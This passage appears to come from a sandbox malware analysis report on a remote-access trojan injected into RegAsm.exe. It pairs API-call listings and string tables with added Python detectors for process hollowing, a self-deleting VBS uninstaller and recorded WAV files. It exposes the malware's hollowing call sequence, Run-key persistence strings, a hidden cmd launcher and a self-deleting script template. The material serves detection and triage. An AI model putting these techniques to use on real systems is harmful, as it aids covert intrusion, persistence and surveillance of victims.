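The call sequence in the listing above (ZwCreateSection/ZwMapViewOfSection/ZwUnmapViewOfSection/ZwClose resolved from ntdll by hand, CreateProcessW with dwCreationFlags 0x4 = CREATE_SUSPENDED, GetThreadContext, a 4-byte ReadProcessMemory from the child, WriteProcessMemory, SetThreadContext, ResumeThread) is the textbook process-hollowing pattern. The following is an added example, not code from the Joe Sandbox report or from the analysed sample: a Python detector that walks an API-call trace and reports a suspended child that the same caller later writes into, re-contexts and resumes. The trace schema (ApiEvent with pid, api, args, ret) and the two sample traces are constructed assumptions that mirror the listed calls; a real trace would come from an API monitor or a sandbox export, and the RegAsm.exe path is the one the report names as the hollowed host.

```python
# Added example (not from the Joe Sandbox report or the analysed sample).
# Detects the process-hollowing call sequence over an API-call trace.
# The trace schema and the sample events are constructed assumptions.
from dataclasses import dataclass, field

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit passed to CreateProcessW in the listing
UNMAP_APIS = ("ZwUnmapViewOfSection", "NtUnmapViewOfSection")
# Steps that must follow the suspended create, in the order they appear in the listing.
HOLLOW_STEPS = ("GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread")


@dataclass
class ApiEvent:
    pid: int                     # process that made the call
    api: str                     # API name, e.g. "CreateProcessW"
    args: dict = field(default_factory=dict)
    ret: int = 0                 # return value (handle, BOOL, NTSTATUS)


def _handle(ev):
    """Target handle of an event: process handle if present, else thread handle."""
    return ev.args.get("hProcess", ev.args.get("hThread"))


def detect_hollowing(events):
    """Return one finding per suspended child that the same caller then writes
    into, re-contexts and resumes. Unmapping is recorded but not required,
    because a hollower may map a new section over the old image instead."""
    findings = []
    for idx, ev in enumerate(events):
        flags = ev.args.get("dwCreationFlags", 0)
        if ev.api != "CreateProcessW" or not (flags & CREATE_SUSPENDED):
            continue
        hproc, hthread = ev.args.get("hProcess"), ev.args.get("hThread")
        # Supporting indicator: ntdll Zw*/Nt* entry points resolved by hand beforehand.
        resolved = [e.args.get("lpProcName") for e in events[:idx]
                    if e.pid == ev.pid and e.api == "GetProcAddress"
                    and str(e.args.get("lpProcName", "")).startswith(("Zw", "Nt"))]
        seen, unmapped = [], False
        for later in events[idx + 1:]:
            if later.pid != ev.pid:
                continue
            h = _handle(later)
            if later.api in UNMAP_APIS and h == hproc:
                unmapped = True
            elif later.api == HOLLOW_STEPS[len(seen)] and h in (hproc, hthread):
                seen.append(later.api)           # only the next expected step counts
                if len(seen) == len(HOLLOW_STEPS):
                    findings.append({
                        "pid": ev.pid,
                        "target": ev.args.get("lpApplicationName"),
                        "hProcess": hproc,
                        "unmapped": unmapped,
                        "ntdll_resolved": resolved,
                        "steps": tuple(seen),
                    })
                    break
    return findings


# Constructed trace mirroring the listing: the parent (pid 1000) spawns RegAsm.exe
# suspended and replaces its image. Handle values are placeholders.
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
HOLLOWING_TRACE = [
    ApiEvent(1000, "GetModuleHandleA", {"lpModuleName": "ntdll"}, 0x77000000),
    ApiEvent(1000, "GetProcAddress", {"hModule": 0x77000000, "lpProcName": "ZwUnmapViewOfSection"}, 0x77001230),
    ApiEvent(1000, "CreateProcessW", {"lpApplicationName": REGASM, "dwCreationFlags": 0x4,
                                      "hProcess": 0x2C8, "hThread": 0x2CC}, 1),
    ApiEvent(1000, "GetThreadContext", {"hThread": 0x2CC}, 1),
    ApiEvent(1000, "ReadProcessMemory", {"hProcess": 0x2C8, "nSize": 4}, 1),
    ApiEvent(1000, "ZwUnmapViewOfSection", {"hProcess": 0x2C8}, 0),
    ApiEvent(1000, "WriteProcessMemory", {"hProcess": 0x2C8, "nSize": 0x1000}, 1),
    ApiEvent(1000, "WriteProcessMemory", {"hProcess": 0x2C8, "nSize": 4}, 1),
    ApiEvent(1000, "SetThreadContext", {"hThread": 0x2CC}, 1),
    ApiEvent(1000, "ResumeThread", {"hThread": 0x2CC}, 1),
]

# Constructed benign trace: a debugger-style suspended start that is only resumed.
BENIGN_TRACE = [
    ApiEvent(2000, "CreateProcessW", {"lpApplicationName": r"C:\Windows\System32\notepad.exe",
                                      "dwCreationFlags": 0x4, "hProcess": 0x1A0, "hThread": 0x1A4}, 1),
    ApiEvent(2000, "GetThreadContext", {"hThread": 0x1A4}, 1),
    ApiEvent(2000, "ResumeThread", {"hThread": 0x1A4}, 1),
]

if __name__ == "__main__":
    for finding in detect_hollowing(HOLLOWING_TRACE):
        print(finding)
```

The detector keys on the handle returned by the suspended create rather than on API names alone, so an installer or debugger that starts a process suspended and merely resumes it does not match; the hand-resolved ntdll exports are reported as supporting evidence, not as a trigger.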
                                  APIs
                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1861856835-1447701601
                                  • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                  • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                  APIs
                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                  • ExitProcess.KERNEL32 ref: 0040D454
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                  • API String ID: 3797177996-2483056239
                                  • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                  • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
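The two listings above (the routines at 0040D558 and 0040D1E0) share one uninstall template: delete the autorun value under HKCU (RegDeleteKeyA with 0x80000001; the Run and Policies\Explorer\Run paths are in the string table), reset the file attributes to FILE_ATTRIBUTE_NORMAL (0x80), unhook the keyboard hook, then drop a VBScript into %Temp% (update.vbs) and ShellExecute it before ExitProcess. The script template is visible in the strings: On Error Resume Next, a FileSystemObject, a while fso.FileExists(...) / fso.DeleteFile ... / wend retry loop so the still-exiting executable is eventually removed, fso.DeleteFolder, and fso.DeleteFile(Wscript.ScriptFullName) to remove the script itself. The following is an added example serving both listings, not code from the Joe Sandbox report or from the sample: a Python classifier that recognises that template in a dropped .vbs file. The two sample scripts and the install path in them are constructed; the registry deletion happens in the native code, not in the script, so it is not part of what the classifier inspects.

```python
# Added example (not from the Joe Sandbox report or the analysed sample).
# Recognises the self-deleting VBS uninstaller whose template strings appear
# in the two listings above. The sample scripts below are constructed.
import re

# One regex per template fragment from the string table.
INDICATORS = {
    "suppress_errors": re.compile(r"^\s*On Error Resume Next\s*$", re.I | re.M),
    "fso_object": re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    # while fso.FileExists("<path>") / fso.DeleteFile "<path>" / wend:
    # keeps retrying until the (still running) executable can be deleted.
    "delete_retry_loop": re.compile(
        r'while\s+fso\.FileExists\("(?P<path>[^"]+)"\)\s*'
        r'fso\.DeleteFile\s+"(?P=path)"\s*wend', re.I),
    "delete_folder": re.compile(r'fso\.DeleteFolder\s+"(?P<dir>[^"]+)"', re.I),
    "self_delete": re.compile(r"fso\.DeleteFile\(Wscript\.ScriptFullName\)", re.I),
    "hidden_cmd": re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ', re.I),
}


def analyze_vbs(text):
    """Report which template fragments are present, which path the retry loop
    deletes, and whether the script is a self-removing uninstaller."""
    hits = {name: rx.search(text) is not None for name, rx in INDICATORS.items()}
    loop = INDICATORS["delete_retry_loop"].search(text)
    folder = INDICATORS["delete_folder"].search(text)
    # Retry-delete of another file plus deletion of the script itself is the
    # uninstaller signature; either fragment alone is common in admin scripts.
    return {
        "indicators": hits,
        "deleted_path": loop.group("path") if loop else None,
        "deleted_folder": folder.group("dir") if folder else None,
        "self_deleting_uninstaller": hits["delete_retry_loop"] and hits["self_delete"],
    }


# Constructed sample in the shape the string table implies; the install path is hypothetical.
SAMPLE_UPDATE_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\victim\AppData\Roaming\svc\svc.exe")
fso.DeleteFile "C:\Users\victim\AppData\Roaming\svc\svc.exe"
wend
fso.DeleteFolder "C:\Users\victim\AppData\Roaming\svc"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign cleanup script: deletes a log once and never itself.
BENIGN_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists("C:\temp\old.log") Then fso.DeleteFile "C:\temp\old.log"
'''

if __name__ == "__main__":
    print(analyze_vbs(SAMPLE_UPDATE_VBS))
    print(analyze_vbs(BENIGN_VBS))
```

Because the script runs after the RAT has already called ExitProcess, the deleted path it names is the best evidence of where the implant lived; the classifier returns it so an analyst can pull the binary from a forensic image even when the on-disk copy is gone.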
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                  • API String ID: 2649220323-436679193
                                  • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                  • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                  APIs
                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                  • API String ID: 738084811-2094122233
                                  • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                  • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Write$Create
                                  • String ID: RIFF$WAVE$data$fmt
                                  • API String ID: 1602526932-4212202414
                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
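The thirteen WriteFile calls above, with their sizes (4, 4, 4, 4, 4, 2, 2, 4, 4, 2, 2, 4, 4 bytes) and literal tags RIFF, WAVE, "fmt " and data, are exactly the 44-byte canonical PCM WAV header: RIFF size, the 16-byte fmt chunk (format tag, channels, sample rate, byte rate, block align, bits per sample) and the data chunk size, which is how the recorded audio is written to disk. The following is an added example, not code from the Joe Sandbox report or from the sample: a Python parser that decodes such a header and cross-checks the derived fields, so recovered capture files can be triaged offline. The build_wav helper and the sample payload are constructed for the demonstration; the only assumption about the sample's own output is the field order the listing shows.

```python
# Added example (not from the Joe Sandbox report or the analysed sample).
# Parses and validates the 44-byte canonical PCM WAV header that the thirteen
# WriteFile calls above emit, so captured-audio artifacts can be triaged offline.
import struct

WAV_HEADER = struct.Struct("<4sI4s4sIHHIIHH4sI")   # exactly 44 bytes, little-endian
PCM = 1


def build_wav(pcm, channels=1, sample_rate=16000, bits=16):
    """Constructed helper that writes the header in the same field order as the
    listing (RIFF, size, WAVE, fmt , 16, tag, channels, rate, byte rate,
    block align, bits, data, size), followed by the PCM payload."""
    block_align = channels * bits // 8
    byte_rate = sample_rate * block_align
    header = WAV_HEADER.pack(b"RIFF", 36 + len(pcm), b"WAVE", b"fmt ", 16, PCM,
                             channels, sample_rate, byte_rate, block_align, bits,
                             b"data", len(pcm))
    return header + pcm


def parse_wav_header(blob):
    """Decode the header and cross-check every derived field. Size fields that
    disagree with the payload usually mean the header was written before the
    recording finished or the file was cut off mid-capture."""
    if len(blob) < WAV_HEADER.size:
        raise ValueError("shorter than a 44-byte canonical WAV header")
    (riff, riff_size, wave, fmt, fmt_size, tag, channels, rate,
     byte_rate, block_align, bits, data, data_size) = WAV_HEADER.unpack_from(blob)
    problems = []
    if (riff, wave, fmt, data) != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        problems.append("chunk ids")
    if fmt_size != 16:
        problems.append("fmt size")
    if tag != PCM:
        problems.append("not PCM")
    if block_align != channels * bits // 8:
        problems.append("block align")
    if byte_rate != rate * block_align:
        problems.append("byte rate")
    if riff_size != 36 + data_size:
        problems.append("riff size")
    if data_size != len(blob) - WAV_HEADER.size:
        problems.append("data length")
    return {
        "valid": not problems,
        "problems": problems,
        "format_tag": tag,
        "channels": channels,
        "sample_rate": rate,
        "bits": bits,
        "data_size": data_size,
        "duration_s": data_size / byte_rate if byte_rate else None,
    }


if __name__ == "__main__":
    sample = build_wav(bytes(3200))             # constructed: 0.1 s of 16 kHz mono silence
    print(parse_wav_header(sample))
    print(parse_wav_header(sample[:-100]))      # truncated capture, flags "data length"
```

The consistency checks matter more than the decode: a header whose RIFF and data sizes agree with each other but not with the file length is the signature of a capture that was still being written when the process was killed, which is common for sandbox-harvested recordings.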
                                  APIs
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                  • API String ID: 1646373207-255920310
                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                  APIs
                                  • _wcslen.LIBCMT ref: 0040CE42
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                  • _wcslen.LIBCMT ref: 0040CF21
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                  • _wcslen.LIBCMT ref: 0040D001
                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                  • API String ID: 1579085052-2309681474
                                  • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                  • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                  APIs
                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                  • _wcslen.LIBCMT ref: 0041C1CC
                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                  • GetLastError.KERNEL32 ref: 0041C204
                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                  • GetLastError.KERNEL32 ref: 0041C261
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                  • String ID: ?
                                  • API String ID: 3941738427-1684325040
                                  • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                  • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
